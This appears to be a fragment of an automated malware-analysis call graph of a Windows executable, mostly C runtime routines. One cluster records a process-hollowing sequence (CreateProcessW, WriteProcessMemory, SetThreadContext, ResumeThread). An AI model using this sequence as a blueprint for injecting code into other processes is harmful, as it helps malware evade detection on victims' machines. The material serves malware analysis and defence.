6329->6330 6331 40a989 type_info::_Type_info_dtor 66 API calls 6330->6331 6332 40c2e9 6331->6332 6333 40a989 type_info::_Type_info_dtor 66 API calls 6332->6333 6334 40c2f1 6333->6334 6335 40a989 type_info::_Type_info_dtor 66 API calls 6334->6335 6336 40c2f9 6335->6336 6337 40a989 type_info::_Type_info_dtor 66 API calls 6336->6337 6338 40c301 6337->6338 6339 40a989 type_info::_Type_info_dtor 66 API calls 6338->6339 6340 40c309 6339->6340 6341 40a989 type_info::_Type_info_dtor 66 API calls 6340->6341 6342 40c311 6341->6342 6343 40a989 type_info::_Type_info_dtor 66 API calls 6342->6343 6344 40c319 6343->6344 6345 40a989 type_info::_Type_info_dtor 66 API calls 6344->6345 6346 40c321 6345->6346 6347 40a989 type_info::_Type_info_dtor 66 API calls 6346->6347 6348 40c32c 6347->6348 6349 40a989 type_info::_Type_info_dtor 66 API calls 6348->6349 6350 40c334 6349->6350 6351 40a989 type_info::_Type_info_dtor 66 API calls 6350->6351 6352 40c33c 6351->6352 6353 40a989 type_info::_Type_info_dtor 66 API calls 6352->6353 6354 40c344 6353->6354 6355 40a989 type_info::_Type_info_dtor 66 API calls 6354->6355 6356 40c34c 6355->6356 6357 40a989 type_info::_Type_info_dtor 66 API calls 6356->6357 6358 40c354 6357->6358 6359 40a989 type_info::_Type_info_dtor 66 API calls 6358->6359 6360 40c35c 6359->6360 6361 40a989 type_info::_Type_info_dtor 66 API calls 6360->6361 6362 40c364 6361->6362 6363 40a989 type_info::_Type_info_dtor 66 API calls 6362->6363 6364 40c36c 6363->6364 6365 40a989 type_info::_Type_info_dtor 66 API calls 6364->6365 6366 40c374 6365->6366 6367 40a989 type_info::_Type_info_dtor 66 API calls 6366->6367 6368 40c37c 6367->6368 6369 40a989 type_info::_Type_info_dtor 66 API calls 6368->6369 6370 40c384 6369->6370 6371 40a989 type_info::_Type_info_dtor 66 API calls 6370->6371 6372 40c38c 6371->6372 6373 40a989 type_info::_Type_info_dtor 66 API calls 6372->6373 6374 40c394 6373->6374 6375 40a989 type_info::_Type_info_dtor 66 API calls 6374->6375 6376 40c39c 6375->6376 6377 40a989 type_info::_Type_info_dtor 66 API calls 6376->6377 6378 40c3a4 6377->6378 6379 40a989 type_info::_Type_info_dtor 66 API calls 6378->6379 6380 40c3b2 6379->6380 6381 40a989 type_info::_Type_info_dtor 66 API calls 6380->6381 6382 40c3bd 6381->6382 6383 40a989 type_info::_Type_info_dtor 66 API calls 6382->6383 6384 40c3c8 6383->6384 6385 40a989 type_info::_Type_info_dtor 66 API calls 6384->6385 6386 40c3d3 6385->6386 6387 40a989 type_info::_Type_info_dtor 66 API calls 6386->6387 6388 40c3de 6387->6388 6389 40a989 type_info::_Type_info_dtor 66 API calls 6388->6389 6390 40c3e9 6389->6390 6391 40a989 type_info::_Type_info_dtor 66 API calls 6390->6391 6392 40c3f4 6391->6392 6393 40a989 type_info::_Type_info_dtor 66 API calls 6392->6393 6394 40c3ff 6393->6394 6395 40a989 type_info::_Type_info_dtor 66 API calls 6394->6395 6396 40c40a 6395->6396 6397 40a989 type_info::_Type_info_dtor 66 API calls 6396->6397 6398 40c415 6397->6398 6399 40a989 type_info::_Type_info_dtor 66 API calls 6398->6399 6399->6314 6400->6243 6404 40a1b0 LeaveCriticalSection 6401->6404 6403 408c35 6403->6222 6404->6403 6406 408ea4 type_info::_Type_info_dtor 6405->6406 6407 407fdd __getptd 66 API calls 6406->6407 6408 408ead 6407->6408 6409 408b93 _LocaleUpdate::_LocaleUpdate 68 API calls 6408->6409 6410 408eb7 6409->6410 6436 408c37 6410->6436 6413 40aa17 __malloc_crt 66 API calls 6414 408ed8 6413->6414 6415 408ff7 type_info::_Type_info_dtor 6414->6415 6443 408cb3 6414->6443 6415->6181 6418 408f08 InterlockedDecrement 6419 408f29 InterlockedIncrement 6418->6419 6422 408f18 6418->6422 6419->6415 6423 408f3f 6419->6423 6420 409004 6420->6415 6421 409017 6420->6421 6424 40a989 type_info::_Type_info_dtor 66 API calls 6420->6424 6425 409c95 _strcat_s 66 API calls 6421->6425 6422->6419 6426 40a989 type_info::_Type_info_dtor 66 API calls 6422->6426 6423->6415 6428 40a28a __lock 66 API calls 6423->6428 6424->6421 6425->6415 6427 408f28 6426->6427 6427->6419 6430 408f53 InterlockedDecrement 6428->6430 6431 408fe2 InterlockedIncrement 6430->6431 6432 408fcf 6430->6432 6453 408ff9 6431->6453 6432->6431 6434 40a989 type_info::_Type_info_dtor 66 API calls 6432->6434 6435 408fe1 6434->6435 6435->6431 6437 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6436->6437 6438 408c4b 6437->6438 6439 408c74 6438->6439 6440 408c56 GetOEMCP 6438->6440 6441 408c79 GetACP 6439->6441 6442 408c66 6439->6442 6440->6442 6441->6442 6442->6413 6442->6415 6444 408c37 getSystemCP 78 API calls 6443->6444 6445 408cd3 6444->6445 6446 408cde setSBCS 6445->6446 6449 408d22 IsValidCodePage 6445->6449 6451 408d47 _memset __setmbcp_nolock 6445->6451 6447 409eb4 __atodbl_l 5 API calls 6446->6447 6448 408e96 6447->6448 6448->6418 6448->6420 6449->6446 6450 408d34 GetCPInfo 6449->6450 6450->6446 6450->6451 6456 408a00 GetCPInfo 6451->6456 6589 40a1b0 LeaveCriticalSection 6453->6589 6455 409000 6455->6415 6457 408ae6 6456->6457 6459 408a34 _memset 6456->6459 6462 409eb4 __atodbl_l 5 API calls 6457->6462 6466 40c24f 6459->6466 6464 408b91 6462->6464 6464->6451 6465 40c050 ___crtLCMapStringA 101 API calls 6465->6457 6467 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6466->6467 6468 40c262 6467->6468 6476 40c095 6468->6476 6471 40c050 6472 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6471->6472 6473 40c063 6472->6473 6542 40bcab 6473->6542 6477 40c0e1 6476->6477 6478 40c0b6 GetStringTypeW 6476->6478 6480 40c1c8 6477->6480 6481 40c0ce 6477->6481 6479 40c0d6 GetLastError 6478->6479 6478->6481 6479->6477 6504 40ef07 GetLocaleInfoA 6480->6504 6482 40c11a MultiByteToWideChar 6481->6482 6499 40c1c2 6481->6499 6487 40c147 6482->6487 6482->6499 6484 409eb4 __atodbl_l 5 API calls 6486 408aa1 6484->6486 6486->6471 6490 40c15c _memset __alloca_probe_16 6487->6490 6491 4087e9 _malloc 66 API calls 6487->6491 6488 40c219 GetStringTypeA 6489 40c234 6488->6489 6488->6499 6494 40a989 type_info::_Type_info_dtor 66 API calls 6489->6494 6493 40c195 MultiByteToWideChar 6490->6493 6490->6499 6491->6490 6496 40c1ab GetStringTypeW 6493->6496 6497 40c1bc 6493->6497 6494->6499 6496->6497 6500 40bc8b 6497->6500 6499->6484 6501 40bc97 6500->6501 6502 40bca8 6500->6502 6501->6502 6503 40a989 type_info::_Type_info_dtor 66 API calls 6501->6503 6502->6499 6503->6502 6505 40ef35 6504->6505 6506 40ef3a 6504->6506 6508 409eb4 __atodbl_l 5 API calls 6505->6508 6535 40f13c 6506->6535 6509 40c1ec 6508->6509 6509->6488 6509->6499 6510 40ef50 6509->6510 6511 40ef90 GetCPInfo 6510->6511 6515 40f01a 6510->6515 6512 40f005 MultiByteToWideChar 6511->6512 6513 40efa7 6511->6513 6512->6515 6519 40efc0 _strlen 6512->6519 6513->6512 6516 40efad GetCPInfo 6513->6516 6514 409eb4 __atodbl_l 5 API calls 6518 40c20d 6514->6518 6515->6514 6516->6512 6517 40efba 6516->6517 6517->6512 6517->6519 6518->6488 6518->6499 6520 4087e9 _malloc 66 API calls 6519->6520 6521 40eff2 _memset __alloca_probe_16 6519->6521 6520->6521 6521->6515 6522 40f04f MultiByteToWideChar 6521->6522 6523 40f086 6522->6523 6524 40f067 6522->6524 6525 40bc8b __freea 66 API calls 6523->6525 6526 40f08b 6524->6526 6527 40f06e WideCharToMultiByte 6524->6527 6525->6515 6528 40f096 WideCharToMultiByte 6526->6528 6529 40f0aa 6526->6529 6527->6523 6528->6523 6528->6529 6530 40aa5c __calloc_crt 66 API calls 6529->6530 6531 40f0b2 6530->6531 6531->6523 6532 40f0bb WideCharToMultiByte 6531->6532 6532->6523 6533 40f0cd 6532->6533 6534 40a989 type_info::_Type_info_dtor 66 API calls 6533->6534 6534->6523 6538 40f6da 6535->6538 6539 40f6f3 6538->6539 6540 40f4ab strtoxl 90 API calls 6539->6540 6541 40f14d 6540->6541 6541->6505 6543 40bccc LCMapStringW 6542->6543 6547 40bce7 6542->6547 6544 40bcef GetLastError 6543->6544 6543->6547 6544->6547 6545 40bee5 6549 40ef07 ___ansicp 90 API calls 6545->6549 6546 40bd41 6548 40bd5a MultiByteToWideChar 6546->6548 6571 40bedc 6546->6571 6547->6545 6547->6546 6556 40bd87 6548->6556 6548->6571 6551 40bf0d 6549->6551 6550 409eb4 __atodbl_l 5 API calls 6552 408ac1 6550->6552 6553 40c001 LCMapStringA 6551->6553 6554 40bf26 6551->6554 6551->6571 6552->6465 6588 40bf5d 6553->6588 6557 40ef50 ___convertcp 73 API calls 6554->6557 6555 40bdd8 MultiByteToWideChar 6559 40bdf1 LCMapStringW 6555->6559 6582 40bed3 6555->6582 6561 4087e9 _malloc 66 API calls 6556->6561 6566 40bda0 __alloca_probe_16 6556->6566 6558 40bf38 6557->6558 6562 40bf42 LCMapStringA 6558->6562 6558->6571 6564 40be12 6559->6564 6559->6582 6560 40c028 6568 40a989 type_info::_Type_info_dtor 66 API calls 6560->6568 6560->6571 6561->6566 6573 40bf64 6562->6573 6562->6588 6563 40bc8b __freea 66 API calls 6563->6571 6567 40be1b 6564->6567 6575 40be44 6564->6575 6565 40a989 type_info::_Type_info_dtor 66 API calls 6565->6560 6566->6555 6566->6571 6572 40be2d LCMapStringW 6567->6572 6567->6582 6568->6571 6569 40bf75 _memset __alloca_probe_16 6581 40bfb3 LCMapStringA 6569->6581 6569->6588 6570 40be5f __alloca_probe_16 6574 40be93 LCMapStringW 6570->6574 6570->6582 6571->6550 6572->6582 6573->6569 6577 4087e9 _malloc 66 API calls 6573->6577 6578 40beab WideCharToMultiByte 6574->6578 6579 40becd 6574->6579 6575->6570 6576 4087e9 _malloc 66 API calls 6575->6576 6576->6570 6577->6569 6578->6579 6580 40bc8b __freea 66 API calls 6579->6580 6580->6582 6583 40bfd3 6581->6583 6584 40bfcf 6581->6584 6582->6563 6586 40ef50 ___convertcp 73 API calls 6583->6586 6587 40bc8b __freea 66 API calls 6584->6587 6586->6584 6587->6588 6588->6560 6588->6565 6589->6455 6591 406e93 6590->6591 6592 407d16 __encode_pointer 6 API calls 6591->6592 6593 406eab 6591->6593 6592->6591 6593->5678 6597 408747 6594->6597 6596 408790 6596->5680 6598 408753 type_info::_Type_info_dtor 6597->6598 6605 40702c 6598->6605 6604 408774 type_info::_Type_info_dtor 6604->6596 6606 40a28a __lock 66 API calls 6605->6606 6607 407033 6606->6607 6608 40865c 6607->6608 6609 407d91 __decode_pointer 6 API calls 6608->6609 6610 408670 6609->6610 6611 407d91 __decode_pointer 6 API calls 6610->6611 6612 408680 6611->6612 6619 408703 6612->6619 6628 40bbe8 6612->6628 6614 407d16 __encode_pointer 6 API calls 6615 4086f8 6614->6615 6617 407d16 __encode_pointer 6 API calls 6615->6617 6616 40869e 6620 4086c2 6616->6620 6624 4086ea 6616->6624 6641 40aaa8 6616->6641 6617->6619 6625 40877d 6619->6625 6620->6619 6621 40aaa8 __realloc_crt 72 API calls 6620->6621 6622 4086d8 6620->6622 6621->6622 6622->6619 6623 407d16 __encode_pointer 6 API calls 6622->6623 6623->6624 6624->6614 6690 407035 6625->6690 6629 40bbf4 type_info::_Type_info_dtor 6628->6629 6630 40bc21 6629->6630 6631 40bc04 6629->6631 6633 40bc62 HeapSize 6630->6633 6635 40a28a __lock 66 API calls 6630->6635 6632 409c95 _strcat_s 66 API calls 6631->6632 6634 40bc09 6632->6634 6637 40bc19 type_info::_Type_info_dtor 6633->6637 6636 4094ac _strcat_s 6 API calls 6634->6636 6638 40bc31 ___sbh_find_block 6635->6638 6636->6637 6637->6616 6646 40bc82 6638->6646 6644 40aab1 6641->6644 6643 40aaf0 6643->6620 6644->6643 6645 40aad1 Sleep 6644->6645 6650 40ebb3 6644->6650 6645->6644 6649 40a1b0 LeaveCriticalSection 6646->6649 6648 40bc5d 6648->6633 6648->6637 6649->6648 6651 40ebbf type_info::_Type_info_dtor 6650->6651 6652 40ebd4 6651->6652 6653 40ebc6 6651->6653 6655 40ebe7 6652->6655 6656 40ebdb 6652->6656 6654 4087e9 _malloc 66 API calls 6653->6654 6677 40ebce type_info::_Type_info_dtor _realloc 6654->6677 6662 40ed59 6655->6662 6673 40ebf4 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 6655->6673 6657 40a989 type_info::_Type_info_dtor 66 API calls 6656->6657 6657->6677 6658 40ed8c 6661 4088c2 _malloc 6 API calls 6658->6661 6659 40ed5e HeapReAlloc 6659->6662 6659->6677 6660 40a28a __lock 66 API calls 6660->6673 6663 40ed92 6661->6663 6662->6658 6662->6659 6664 40edb0 6662->6664 6666 4088c2 _malloc 6 API calls 6662->6666 6669 40eda6 6662->6669 6665 409c95 _strcat_s 66 API calls 6663->6665 6667 409c95 _strcat_s 66 API calls 6664->6667 6664->6677 6665->6677 6666->6662 6668 40edb9 GetLastError 6667->6668 6668->6677 6671 409c95 _strcat_s 66 API calls 6669->6671 6684 40ed27 6671->6684 6672 40ec7f HeapAlloc 6672->6673 6673->6658 6673->6660 6673->6672 6675 40ecd4 HeapReAlloc 6673->6675 6676 40b6b4 ___sbh_alloc_block 5 API calls 6673->6676 6673->6677 6678 4088c2 _malloc 6 API calls 6673->6678 6679 40ed3f 6673->6679 6681 40ed22 6673->6681 6685 40af05 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 6673->6685 6686 40ecf7 6673->6686 6674 40ed2c GetLastError 6674->6677 6675->6673 6676->6673 6677->6644 6678->6673 6679->6677 6680 409c95 _strcat_s 66 API calls 6679->6680 6682 40ed4c 6680->6682 6683 409c95 _strcat_s 66 API calls 6681->6683 6682->6668 6682->6677 6683->6684 6684->6674 6684->6677 6685->6673 6689 40a1b0 LeaveCriticalSection 6686->6689 6688 40ecfe 6688->6673 6689->6688 6693 40a1b0 LeaveCriticalSection 6690->6693 6692 40703c 6692->6604 6693->6692 6695 403284 6694->6695 6696 403430 6695->6696 6729 4018a0 6695->6729 6696->5685 6696->5686 6696->5687 6698 4033cf 6733 403140 6698->6733 6703 4034c0 FindFirstPrinterChangeNotification 6702->6703 6704 403500 6703->6704 6781 403570 FindFirstPrinterChangeNotification 6704->6781 6706 40350f 6706->5689 6707->5697 6708->5702 6709->5701 6710->5699 6712 403520 FindClosePrinterChangeNotification 6711->6712 6713 40601e 6712->6713 6713->5706 6714->5709 6715->5711 6717 403551 6716->6717 6717->5719 6718->5725 6719->5735 6720->5742 6721->5750 6722->5757 6724 403520 FindClosePrinterChangeNotification 6723->6724 6725 405fc9 6724->6725 6725->5745 6726->5730 6727->5725 6728->5718 6730 4018d1 GetModuleHandleA 6729->6730 6732 402990 6730->6732 6732->6698 6755 406048 6733->6755 6736 414189 6737 41471d 6736->6737 6738 41419f 6736->6738 6737->6696 6738->6737 6779 414154 GetPEB 6738->6779 6740 414230 6741 414154 GetPEB 6740->6741 6742 41423b 6741->6742 6742->6737 6743 414452 CreateProcessW 6742->6743 6746 4144c5 VirtualAlloc 6742->6746 6748 414618 WriteProcessMemory 6742->6748 6750 4146c7 VirtualFree 6742->6750 6754 414697 VirtualProtectEx 6742->6754 6743->6742 6744 414475 GetThreadContext 6743->6744 6744->6742 6745 41448a ReadProcessMemory 6744->6745 6745->6742 6746->6742 6747 4144e2 VirtualAllocEx 6746->6747 6747->6742 6748->6742 6749 414630 VirtualProtectEx 6748->6749 6749->6742 6750->6742 6751 4146d5 WriteProcessMemory 6750->6751 6751->6742 6752 4146f0 SetThreadContext 6751->6752 6752->6742 6753 414710 ResumeThread 6752->6753 6753->6737 6753->6742 6754->6742 6759 4062c6 6755->6759 6756 4087e9 _malloc 66 API calls 6756->6759 6757 403150 6757->6736 6758 4088c2 _malloc 6 API calls 6758->6759 6759->6756 6759->6757 6759->6758 6762 4062ec std::bad_alloc::bad_alloc 6759->6762 6760 406312 6767 4062a9 6760->6767 6762->6760 6764 408783 __cinit 73 API calls 6762->6764 6764->6760 6766 40632a 6773 40857f 6767->6773 6770 4088ea 6771 408913 6770->6771 6772 40891f RaiseException 6770->6772 6771->6772 6772->6766 6774 40859f _strlen 6773->6774 6778 4062b9 6773->6778 6775 4087e9 _malloc 66 API calls 6774->6775 6774->6778 6776 4085b2 6775->6776 6777 409beb _strcpy_s 66 API calls 6776->6777 6776->6778 6777->6778 6778->6770 6780 414167 6779->6780 6780->6740 6781->6706 6783 407110 type_info::_Type_info_dtor 6782->6783 6784 40a28a __lock 66 API calls 6783->6784 6785 407117 6784->6785 6786 4071d0 __initterm 6785->6786 6789 407d91 __decode_pointer 6 API calls 6785->6789 6799 40721b 6786->6799 6791 40714e 6789->6791 6790 407218 type_info::_Type_info_dtor 6790->5760 6791->6786 6794 407d91 __decode_pointer 6 API calls 6791->6794 6793 40720f 6795 407014 _fast_error_exit 2 API calls 6793->6795 6798 407163 6794->6798 6795->6790 6796 407d91 6 API calls __decode_pointer 6796->6798 6797 407d88 6 API calls __init_pointers 6797->6798 6798->6786 6798->6796 6798->6797 6800 407221 6799->6800 6802 4071fc 6799->6802 6804 40a1b0 LeaveCriticalSection 6800->6804 6802->6790 6803 40a1b0 LeaveCriticalSection 6802->6803 6803->6793 6804->6802 6805 406f40 6806 406f7c 6805->6806 6807 406f52 6805->6807 6807->6806 6809 40a0c4 6807->6809 6810 40a0d0 type_info::_Type_info_dtor 6809->6810 6811 407fdd __getptd 66 API calls 6810->6811 6812 40a0d5 6811->6812 6815 40e97e 6812->6815 6816 40e9a4 6815->6816 6817 40e99d 6815->6817 6827 40a462 6816->6827 6818 4072c8 __NMSG_WRITE 66 API calls 6817->6818 6818->6816 6822 40e9b5 _memset 6823 40ea8d 6822->6823 6825 40ea4d SetUnhandledExceptionFilter UnhandledExceptionFilter 6822->6825 6851 407246 6823->6851 6825->6823 6828 407d91 __decode_pointer 6 API calls 6827->6828 6829 40a46d 6828->6829 6829->6822 6830 40a46f 6829->6830 6834 40a47b type_info::_Type_info_dtor 6830->6834 6831 40a4d7 6832 40a4b8 6831->6832 6837 40a4e6 6831->6837 6836 407d91 __decode_pointer 6 API calls 6832->6836 6833 40a4a2 6835 407f64 __getptd_noexit 66 API calls 6833->6835 6834->6831 6834->6832 6834->6833 6840 40a49e 6834->6840 6838 40a4a7 _siglookup 6835->6838 6836->6838 6839 409c95 _strcat_s 66 API calls 6837->6839 6842 40a54d 6838->6842 6844 407246 _raise 66 API calls 6838->6844 6850 40a4b0 type_info::_Type_info_dtor 6838->6850 6841 40a4eb 6839->6841 6840->6833 6840->6837 6843 4094ac _strcat_s 6 API calls 6841->6843 6845 40a28a __lock 66 API calls 6842->6845 6846 40a558 6842->6846 6843->6850 6844->6842 6845->6846 6847 407d88 __init_pointers 6 API calls 6846->6847 6848 40a58d 6846->6848 6847->6848 6854 40a5e3 6848->6854 6850->6822 6852 407104 _doexit 66 API calls 6851->6852 6853 407257 6852->6853 6855 40a5f0 6854->6855 6856 40a5e9 6854->6856 6855->6850 6858 40a1b0 LeaveCriticalSection 6856->6858 6858->6855 6859 408340 6860 408379 6859->6860 6861 40836c 6859->6861 6863 409eb4 __atodbl_l 5 API calls 6860->6863 6862 409eb4 __atodbl_l 5 API calls 6861->6862 6862->6860 6869 408389 __except_handler4 __IsNonwritableInCurrentImage 6863->6869 6864 40840c 6865 4083e2 __except_handler4 6865->6864 6866 4083fc 6865->6866 6867 409eb4 __atodbl_l 5 API calls 6865->6867 6868 409eb4 __atodbl_l 5 API calls 6866->6868 6867->6866 6868->6864 6869->6864 6869->6865 6875 40babe RtlUnwind 6869->6875 6871 40845b __except_handler4 6872 40848f 6871->6872 6873 409eb4 __atodbl_l 5 API calls 6871->6873 6874 409eb4 __atodbl_l 5 API calls 6872->6874 6873->6872 6874->6865 6875->6871 7233 406282 7234 4085dc moneypunct 66 API calls 7233->7234 7235 406295 moneypunct 7234->7235 7236 406f82 SetUnhandledExceptionFilter 7043 407e03 TlsAlloc 7237 40a684 7238 40a690 SetLastError 7237->7238 7239 40a698 type_info::_Type_info_dtor 7237->7239 7238->7239 7044 406505 7047 4064c3 7044->7047 7048 4064d6 7047->7048 7049 4064ef 7047->7049 7053 409692 7048->7053 7060 40973a 7049->7060 7052 4064df 7054 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7053->7054 7055 4096b8 7054->7055 7067 40d110 7055->7067 7057 4096d0 __ld12tod 7058 409eb4 __atodbl_l 5 API calls 7057->7058 7059 409738 7058->7059 7059->7052 7061 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7060->7061 7062 409760 7061->7062 7063 40d110 ___strgtold12_l 66 API calls 7062->7063 7064 409778 __ld12tod 7063->7064 7065 409eb4 __atodbl_l 5 API calls 7064->7065 7066 4097e0 7065->7066 7066->7052 7068 40d15b 7067->7068 7074 40d17a 7067->7074 7069 409c95 _strcat_s 66 API calls 7068->7069 7070 40d160 7069->7070 7071 4094ac _strcat_s 6 API calls 7070->7071 7076 40d170 7071->7076 7072 409eb4 __atodbl_l 5 API calls 7073 40d7d5 7072->7073 7073->7057 7074->7076 7077 40f152 7074->7077 7076->7072 7080 40f184 7077->7080 7078 409eb4 __atodbl_l 5 API calls 7079 40f31e 7078->7079 7079->7076 7080->7078 7092 406228 7093 406237 7092->7093 7094 40623d 7092->7094 7095 407246 _raise 66 API calls 7093->7095 7098 40726b 7094->7098 7095->7094 7097 406242 type_info::_Type_info_dtor 7099 407104 _doexit 66 API calls 7098->7099 7100 407276 7099->7100 7100->7097 7174 40a0e8 7175 40a0eb 7174->7175 7176 40e97e _abort 68 API calls 7175->7176 7177 40a0f7 type_info::_Type_info_dtor 7176->7177 6892 406e6a 6895 406de2 6892->6895 6894 406e88 6896 406e4e 6895->6896 6897 406def 6895->6897 6953 4066d3 6896->6953 6897->6896 6899 406df4 6897->6899 6901 406e12 6899->6901 6902 406df9 6899->6902 6900 406e33 6900->6894 6903 406e35 6901->6903 6906 406e1c 6901->6906 6909 406c2d 6902->6909 6940 4067c3 6903->6940 6923 406ce8 6906->6923 6967 409e24 6909->6967 6912 406c67 6913 409c95 _strcat_s 66 API calls 6912->6913 6915 406c6c 6913->6915 6914 406c86 6977 409ca8 6914->6977 6916 4094ac _strcat_s 6 API calls 6915->6916 6922 406c78 6916->6922 6919 409eb4 __atodbl_l 5 API calls 6921 406ce6 6919->6921 6921->6894 6922->6919 6924 409e24 __fltout2 66 API calls 6923->6924 6926 406d19 6924->6926 6925 406d22 6927 409c95 _strcat_s 66 API calls 6925->6927 6926->6925 6928 406d44 6926->6928 6929 406d27 6927->6929 6932 409ca8 __fptostr 66 API calls 6928->6932 6930 4094ac _strcat_s 6 API calls 6929->6930 6931 406d33 6930->6931 6934 409eb4 __atodbl_l 5 API calls 6931->6934 6933 406d70 6932->6933 6933->6931 6935 406db7 6933->6935 6937 406d8f 6933->6937 6936 406de0 6934->6936 7021 406564 6935->7021 6936->6900 6939 406b36 __cftof2_l 76 API calls 6937->6939 6939->6931 6941 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6940->6941 6942 4067e8 6941->6942 6943 4067f7 6942->6943 6945 406827 6942->6945 6944 409c95 _strcat_s 66 API calls 6943->6944 6946 4067fc 6944->6946 6947 406835 6945->6947 6950 40683e 6945->6950 6949 4094ac _strcat_s 6 API calls 6946->6949 6948 409c95 _strcat_s 66 API calls 6947->6948 6948->6946 6952 40680b __alldvrm _memset __cftoa_l _strrchr 6949->6952 6950->6952 7040 4067a3 6950->7040 6952->6900 6954 409e24 __fltout2 66 API calls 6953->6954 6955 406704 6954->6955 6956 40670d 6955->6956 6957 40672c 6955->6957 6958 409c95 _strcat_s 66 API calls 6956->6958 6962 409ca8 __fptostr 66 API calls 6957->6962 6959 406712 6958->6959 6960 4094ac _strcat_s 6 API calls 6959->6960 6961 40671e 6960->6961 6964 409eb4 __atodbl_l 5 API calls 6961->6964 6963 406770 6962->6963 6963->6961 6966 406564 __cftoe2_l 76 API calls 6963->6966 6965 4067a1 6964->6965 6965->6900 6966->6961 6968 409e4f ___dtold 6967->6968 7003 40da31 6968->7003 6971 409beb _strcpy_s 66 API calls 6972 409e8a 6971->6972 6973 409e9d 6972->6973 6974 409384 __invoke_watson 10 API calls 6972->6974 6975 409eb4 __atodbl_l 5 API calls 6973->6975 6974->6973 6976 406c5e 6975->6976 6976->6912 6976->6914 6978 409cdd 6977->6978 6979 409cbf 6977->6979 6978->6979 6980 409ce2 6978->6980 6981 409c95 _strcat_s 66 API calls 6979->6981 6983 409cf7 6980->6983 6987 409d05 _strlen 6980->6987 6982 409cc4 6981->6982 6984 4094ac _strcat_s 6 API calls 6982->6984 6985 409c95 _strcat_s 66 API calls 6983->6985 6986 406cb9 6984->6986 6985->6982 6986->6922 6989 406b36 6986->6989 6987->6986 6988 4097f0 ___sbh_free_block __VEC_memcpy 6987->6988 6988->6986 6990 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6989->6990 6991 406b54 6990->6991 6992 406b58 6991->6992 6996 406b8b 6991->6996 6993 409c95 _strcat_s 66 API calls 6992->6993 6994 406b5d 6993->6994 6995 4094ac _strcat_s 6 API calls 6994->6995 7002 406b6e _memset 6995->7002 6997 406bc7 6996->6997 7017 40651f 6996->7017 6999 40651f __shift __VEC_memcpy 6997->6999 6997->7002 7000 406bdc 6999->7000 7001 40651f __shift __VEC_memcpy 7000->7001 7000->7002 7001->7002 7002->6922 7006 40daa7 7003->7006 7004 40db14 7008 409beb _strcpy_s 66 API calls 7004->7008 7005 409eb4 __atodbl_l 5 API calls 7007 409e6a 7005->7007 7006->7004 7009 40db2c 7006->7009 7016 40dac4 7006->7016 7007->6971 7010 40db77 7008->7010 7011 409beb _strcpy_s 66 API calls 7009->7011 7012 409384 __invoke_watson 10 API calls 7010->7012 7010->7016 7013 40db4b 7011->7013 7012->7016 7014 409384 __invoke_watson 10 API calls 7013->7014 7013->7016 7014->7016 7015 40e329 7016->7005 7016->7015 7018 406528 _strlen 7017->7018 7019 406539 7017->7019 7020 4097f0 ___sbh_free_block __VEC_memcpy 7018->7020 7019->6997 7020->7019 7022 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7021->7022 7023 40657c 7022->7023 7024 406582 7023->7024 7025 4065b2 7023->7025 7026 409c95 _strcat_s 66 API calls 7024->7026 7028 4065c6 7025->7028 7029 4065cf 7025->7029 7027 406587 7026->7027 7030 4094ac _strcat_s 6 API calls 7027->7030 7031 409c95 _strcat_s 66 API calls 7028->7031 7032 40651f __shift __VEC_memcpy 7029->7032 7033 4065f3 7029->7033 7037 406596 7030->7037 7031->7027 7032->7033 7034 409beb _strcpy_s 66 API calls 7033->7034 7035 40664a 7034->7035 7036 409384 __invoke_watson 10 API calls 7035->7036 7038 40665d 7035->7038 7036->7038 7037->6931 7038->7037 7039 4097f0 ___sbh_free_block __VEC_memcpy 7038->7039 7039->7037 7041 4066d3 __cftoe_l 76 API calls 7040->7041 7042 4067be 7041->7042 7042->6952 7101 40ba2c 7102 40ba3e 7101->7102 7104 40ba4c @_EH4_CallFilterFunc@8 7101->7104 7103 409eb4 __atodbl_l 5 API calls 7102->7103 7103->7104 7105 408630 7108 408620 7105->7108 7107 40863d moneypunct 7111 40baef 7108->7111 7110 40862e 7110->7107 7112 40bafb type_info::_Type_info_dtor 7111->7112 7113 40a28a __lock 66 API calls 7112->7113 7117 40bb02 7113->7117 7114 40bb3b 7121 40bb56 7114->7121 7116 40bb4c type_info::_Type_info_dtor 7116->7110 7117->7114 7118 40bb32 7117->7118 7120 40a989 type_info::_Type_info_dtor 66 API calls 7117->7120 7119 40a989 type_info::_Type_info_dtor 66 API calls 7118->7119 7119->7114 7120->7118 7124 40a1b0 LeaveCriticalSection 7121->7124 7123 40bb5d 7123->7116 7124->7123 7173 40edd0 RtlUnwind 6879 406551 6882 406425 6879->6882 6883 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6882->6883 6884 406439 6883->6884 6885 406252 6888 4084cc 6885->6888 6887 406257 6887->6887 6889 4084f1 6888->6889 6890 4084fe GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 6888->6890 6889->6890 6891 4084f5 6889->6891 6890->6891 6891->6887 7081 406214 7084 4074ac 7081->7084 7085 407f64 __getptd_noexit 66 API calls 7084->7085 7086 406225 7085->7086 7240 4060b4 7241 4060be __cfltcvt_init 7240->7241 7246 406f17 GetModuleHandleA 7241->7246 7244 4060d3 7247 4060c3 7246->7247 7247->7244 7248 406eae 7247->7248 7253 40a058 7248->7253 7250 406ec3 7251 406ed4 7250->7251 7252 409384 __invoke_watson 10 API calls 7250->7252 7251->7244 7252->7251 7254 40a09c __control87 7253->7254 7256 40a073 __control87 7253->7256 7254->7250 7255 409c95 _strcat_s 66 API calls 7257 40a08d 7255->7257 7256->7255 7258 4094ac _strcat_s 6 API calls 7257->7258 7258->7254 7087 408716 7088 40aa5c __calloc_crt 66 API calls 7087->7088 7089 408722 7088->7089 7090 407d16 __encode_pointer 6 API calls 7089->7090 7091 40872a 7090->7091 7182 407ff7 7183 408003 type_info::_Type_info_dtor 7182->7183 7184 40801b 7183->7184 7185 40a989 type_info::_Type_info_dtor 66 API calls 7183->7185 7187 408105 type_info::_Type_info_dtor 7183->7187 7186 408029 7184->7186 7188 40a989 